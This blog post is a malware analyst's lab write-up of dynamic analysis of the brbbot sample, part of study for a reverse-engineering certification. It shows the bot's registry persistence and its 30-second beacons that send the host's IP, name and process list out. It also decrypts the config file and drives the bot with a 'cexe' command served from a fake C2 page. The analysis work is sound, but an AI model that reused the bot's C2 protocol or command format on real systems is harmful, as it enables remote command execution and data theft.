Monday, January 11, 2021

Continuing Malware Analysis - Dynamic Analysis of BrbBot

This post and all others for this month are part of the series which I used to help me prepare for my GIAC Reverse Engineer Malware (GREM) certification.

In the previous post, we did static analysis of Brbbot. In this post, we look at dynamic analysis, to gain insights into the behaviour of the program. Remember, VirusTotal reported that 52/74 engines reported this file as malicious.

The tools use here will be as follows:
- TShark
- InetSim on Kali
- Process Monitor - Windows 10
- Process Hacker - Windows 10
- Process Explorer - Windows 10
- RegShot - Windows 10
- ProcDot

Let's see what the tools above provided us once we executed brbbot.exe on Windows 10 as an administrator

Looking first at the RegShot comparison summary, we see:

RegShot Comparison Summary

Note the total changes are not all from running brbbot.exe but also from other programs which were executed intentionally or unintentionally.

Looking at the report and picking out a few entries of immediate interest.

Created with Regshot 1.9.1 x64 Unicode (beta r321)
Datetime: 2020-11-08 20:19:04, 2020-11-08 22:15:15
Username: SecurityNik, SecurityNik

Values added: 
 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\brbbot: "C:\Users\SecurityNik\AppData\Roaming\brbbot.exe"
HKU\S-1-5-21-3846991316-327138358-508696823-1002\Software\Microsoft\Windows\CurrentVersion\Search\RecentApps\{A6858C8A-6321-4416-ACF2-A4DF3C4480B4}\AppId: "C:\brbbot.exe"
 HKU\S-1-5-21-3846991316-327138358-508696823-1002\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\brbbot.exe: 53 41 43 50 01 00 00 00 00 00 00 00 07 00 00 00 28 00 00 00 00 28 01 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 0A 73 20 00 00 DB 80 FD AC 28 39 D3 01 00 00 00 00 00 00 00 00
 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\brbbot: "C:\Users\SecurityNik\AppData\Roaming\brbbot.exe"
 HKU\S-1-5-21-3846991316-327138358-508696823-1002\Software\Microsoft\Windows\CurrentVersion\Search\RecentApps\{A6858C8A-6321-4416-ACF2-A4DF3C4480B4}\AppId: "C:\brbbot.exe"

Taking a quick look via Process Hacker.

Looking at the general tab

Peaking into the Strings loaded into memory.

Peaking into the modules being used brbbot.exe. 

Looking at the Handles.

Transitioning to Process Monitor, we see along with the network connections, we see a file named brbconfig.tmp is being read and then closed. If you remember, in the static analysis there was a config file in the resource section. Could this be the file being read here?

Transitioning to ProcDot, where a save copy of the Process Monitor events are fed to it as input file. 

Transitioning to the network traffic as see from the perspective of Inetsim and TShark.

Looking first at the INetSim report below, we see a DNS request to followed by an HTTP GET request. The GET request seems to be for a file named ads.php. Additionally, the request has some parameters for which i seems to be my computer's IP address and c seeming to be my computer name. Additionally, there is a parameter p for which seems to be a long value which seems to be Hex values.

$ sudo cat /var/log/inetsim/report/report.18951.txt | more
=== Report for session '18951' ===

Real start date            : 2020-11-08 17:11:53
Simulated start date       : 2020-11-08 17:11:53
Time difference on startup : none

2020-11-08 17:12:52  DNS connection, type: A, class: IN, requested name:
2020-11-08 17:12:52  HTTP connection, method: GET, URL:
0822282f3e36083e2f2f32353c28753e233e602f3a28303334282f2c753e233e603f37373334282f753e233e603f37373334282f753e233e6039293939342f753e233e, f
ile name: /var/lib/inetsim/http/fakefiles/sample.html


Let's get TShark's view of this communication. First, looking at the DNS request and response, we see the query for

└─$ tshark -r brbbot.pcap -Y " =="
   15 25.543214256 →   DNS 73 Standard query 0x6a64 A
   16 25.551623068 →   DNS 89 Standard query response 0x6a64 A A

Looking at the HTTP Traffic, we see below that I have multiple connections. Looking closely at the time, it seems the malware calls home (beacons) every 30 seconds.

└─$ tshark -r brbbot.pcap -Y " ==" -T fields -e frame.time -e ip.src -e tcp.srcport -e ip.dst -e tcp.dstport -e -E header=y
           frame.time                     ip.src   tcp.srcport  ip.dst     tcp.dstport
Nov  8, 2020 17:12:52.715732789 EST      4081      80
Nov  8, 2020 17:13:22.745066520 EST      4082      80
Nov  8, 2020 17:13:52.763137491 EST      4084      80
Nov  8, 2020 17:14:22.782289408 EST      4086      80
Nov  8, 2020 17:14:52.826690345 EST      4087      80
Nov  8, 2020 17:15:22.865526674 EST      4088      80
Nov  8, 2020 17:15:52.908439391 EST      4089      80
Nov  8, 2020 17:16:22.928449020 EST      4090      80
Nov  8, 2020 17:16:52.954382147 EST      4092      80

Looking into the session with source source port 4081 and destination port 80, we see:

└─$ tshark -r brbbot.pcap -q -z follow,tcp,ascii,,                                                     130 ⨯

Follow: tcp,ascii
Filter: ((ip.src eq and tcp.srcport eq 4081) and (ip.dst eq and tcp.dstport eq 80)) or ((ip.src eq and tcp.srcport eq 80) and (ip.dst eq and tcp.dstport eq 4081))
Node 0:
Node 1:
GET /ads.php?i= HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
Connection: Close
Cache-Control: no-cache

HTTP/1.1 200 OK
Connection: Close
Content-Type: text/html
Date: Sun, 08 Nov 2020 22:12:52 GMT
Content-Length: 258
Server: INetSim HTTP Server

    <title>INetSim default HTML page</title>
    <p align="center">This is the default HTML page for INetSim HTTP server fake mode.</p>
    <p align="center">This file is an HTML document.</p>

Above we see the default INetSim page returned. However, the request was made for ads.php. Maybe we can manipulate this request by adding a file called ads.php. I instead switched to Apache and created a file named ads.php into the apache director and then let brbbot.exe grab that file. That seems to work. Let's see what that looks like. Here is the file.

└─$ sudo cat /var/www/html/ads.php
        <TITLE>SecurityNik ads.php</TITLE>
                Welcome to SecurityNik World!


When the bot makes the request, we see Apache returned ads.php via the 200 successful message. - - [08/Nov/2020:22:24:05 -0500] "GET /ads.php?i= HTTP/1.1" 200 292 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"

Stepping back for a second, we saw the system create a file brbconfig.tmp. Looking into the file, we see:

The above does not seem helpful in anyway. Taking a look via Hexdump

Looks like we will need to decrypt or decode this file. If we remember, during the static analysis phase, we saw cryptographic functions such as:

Setting a Breakpoint on the CreateFileA function, we see the first argument is in the RCX register. If I understood the x64 calling conventions clearly, it leverages the register RCX, RDX, R8 and R9 for parameters before using the Stack.. In this case the first parameter of the CreateFileA is the lpFileName. If I am wrong on this, please correct me if you are reading this.

Now that we know the file is created, let's jump to where it is read, by setting another breakpoint, this time on the ReadFile call. Looking at Microsoft documentation, it says the first argument to the ReadFile call is a handle to the device. Looking below, we see the handle is 0x108 which can be found in the RCX register.

Confirming that this is the handle to the brbconfig.tmp file, we now take a look at the handles from a different perspective. This time we go back to SysInternals Handle64.exe.

C:\Tools\SysinternalsSuite>handle64.exe -p brbbot.exe                    
Nthandle v4.11 - Handle viewer  
Copyright (C) 1997-2017 Mark Russinovich 
Sysinternals - 
brbbot.exe pid: 4164 SECURITYNIK-WIN\SecurityNik
108: File  (R--)   C:\GREM-Malware\Malware\day1\brbconfig.tmp

Above we see 0x108 handle points to the brbconfig.tmp file. 

Scrolling through until I fond the CryptDecrypt function, I then set a breakpoint at the instruction directly after. This then allowed me to see the decrypted content of the brbconfig.tmp file as shown below.

The decrypted communication looks like


Above we see the ads.php file is requested with what seems to be commands to execute and an encode value of 5b.

Let's add a value to exec for notepad.exe to our ads.php file to see what we get

─$ sudo bash -c 'echo -e cexe notepad.exe > /var/www/html/ads.php'
─$ sudo cat /var/www/html/ads.php                                 
cexe notepad.exe

Running brbbot.exe again, we see that that notepad is being executed around every 30 seconds.

PS C:\Users\SecurityNik> Get-Process *notepad* | Select-Object -Property Name,Id,StartTime,ProcessName | Sort-Object -Property StartTime

Name      Id StartTime             ProcessName
----      -- ---------             -----------
notepad 5444 11/9/2020 11:38:58 PM notepad
notepad 3528 11/9/2020 11:39:29 PM notepad
notepad 3856 11/9/2020 11:39:59 PM notepad
notepad 7740 11/9/2020 11:40:29 PM notepad
notepad 5376 11/9/2020 11:40:59 PM notepad
notepad 6984 11/9/2020 11:41:29 PM notepad
notepad 7252 11/9/2020 11:41:59 PM notepad
notepad 7748 11/9/2020 11:42:29 PM notepad
notepad 7176 11/9/2020 11:42:59 PM notepad
notepad 2964 11/9/2020 11:43:29 PM notepad
notepad 3640 11/9/2020 11:43:59 PM notepad
notepad 2280 11/9/2020 11:44:29 PM notepad
notepad 5448 11/9/2020 11:44:59 PM notepad
notepad 8184 11/9/2020 11:45:29 PM notepad
notepad 2112 11/9/2020 11:45:59 PM notepad
notepad 2428 11/9/2020 11:46:29 PM notepad
notepad 3368 11/9/2020 11:46:59 PM notepad
notepad 5036 11/9/2020 11:47:29 PM notepad
notepad 3632 11/9/2020 11:47:59 PM notepad
notepad 2608 11/9/2020 11:48:29 PM notepad
notepad 6372 11/9/2020 11:48:59 PM notepad
notepad 7524 11/9/2020 11:49:29 PM notepad
notepad 6780 11/9/2020 11:49:59 PM notepad
notepad  248 11/9/2020 11:50:29 PM notepad
notepad 7616 11/9/2020 11:50:59 PM notepad
notepad  192 11/9/2020 11:51:29 PM notepad

Taking a view via WMIC, we see:

PS C:\Users\SecurityNik> wmic process where "name like '%notepad%'" get name,processID,ParentProcessID
Name         ParentProcessId  ProcessId
notepad.exe  1596             5444
notepad.exe  1596             3528
notepad.exe  1596             3856
notepad.exe  1596             7740
notepad.exe  1596             5376
notepad.exe  1596             6984
notepad.exe  1596             7252
notepad.exe  1596             7748
notepad.exe  1596             7176
notepad.exe  1596             2964
notepad.exe  1596             3640
notepad.exe  1596             2280
notepad.exe  1596             5448
notepad.exe  1596             8184
notepad.exe  1596             2112
notepad.exe  1596             2428
notepad.exe  1596             3368
notepad.exe  1596             5036
notepad.exe  1596             3632
notepad.exe  1596             2608
notepad.exe  1596             6372
notepad.exe  1596             7524
notepad.exe  1596             6780
notepad.exe  1596             248
notepad.exe  1596             7616
notepad.exe  1596             192
notepad.exe  1596             672

Looking at the parent for those Notepad.exe processes, we see brbbot.exe is the parent with PID 1596.

PS C:\Users\SecurityNik> wmic process where processid="1596" get name,processID,parentProcessID
Name        ParentProcessId  ProcessId
brbbot.exe  4476             1596

Final step now is to decode the traffic from the HTTP request within the p parameter above. We saw in the ads.php file a value of encode=5b. This 5b is used to Hex encode the values within the p parameter. I copied the values in the p parameter to a file named p-parameter.txt with everything on one line. Here is what that looks like.

└─$ cat p-parameter.txt 

xxd is used next to revert the hex values above to raw binary as show below:

└─$ xxd -revert -plain p-parameter.txt > p-parameter.raw

The file p-parameter.raw looks like.

└─$ cat p-parameter.raw           
?7>"(/>6`(6((u>#>`8()((u>#>`,25252/u>#>`8()((u>#>`,2574<45u>#>`(>)-28>(u>#>`7(:((u>#>`(-834(/u>#>`=45/?)-34(/u>#>`=45/?4>)-28>u>#>`>64)"{▒46+)>((245`(-834(/u>#>`(-834(/u>#>`(-834(/u>#>`(-834(/u>#>`(-834(/u>#>`(+447(-u>#>`(-834(/u>#>"(645u>#>`(+7.50?u>#>>8.)2/">:7/>)-28>u>#>`(-834(/u>#>`.5(>8:++u>#>`84534(/u>#>`(+7.50v,25>-/74<u>#>`(-834(/u>#>>:)835?>#>)u>#>`(-834(/u>#>`(234(/u>#>`(-834(/u>#>`/:(034(/,u>#>`8/=645u>#>`>#+74)>)u>#>3>77#+>)2>58>4(/u>#>>:)83u>#>`       .5/26>)4#):"u>#>`5>)2->u>#>`>7+0>)u>#>0"+>:80<)4.5?4(/u>#>▒.2u>#>`
                                                       )48>((:80>)u>#>`+)48>#+mou>#>`   .5/26>)40>)u>#>`?7734(/u>#>`86?u>#>`84534(/u>#>`
                            )48645mou>#>`       ><(34/v#mov5284?>u>#>`(-834(/u>#>`

To decode the p-parameter.raw file, I passed it as input to CyberChef.

After decoding, we see that along with the IP address and computer name, brbbot.exe also was exfiltrating information on the processes currently running on the host.

That's all for this post as I believe I achieved the learnings I was required for this malware.

P.S. Not sure if you noticed it. However, I had to run brbbot.exe a few times and thus you might have noticed the PID changed, etc. The concepts still remain the same though.

No comments:

Post a Comment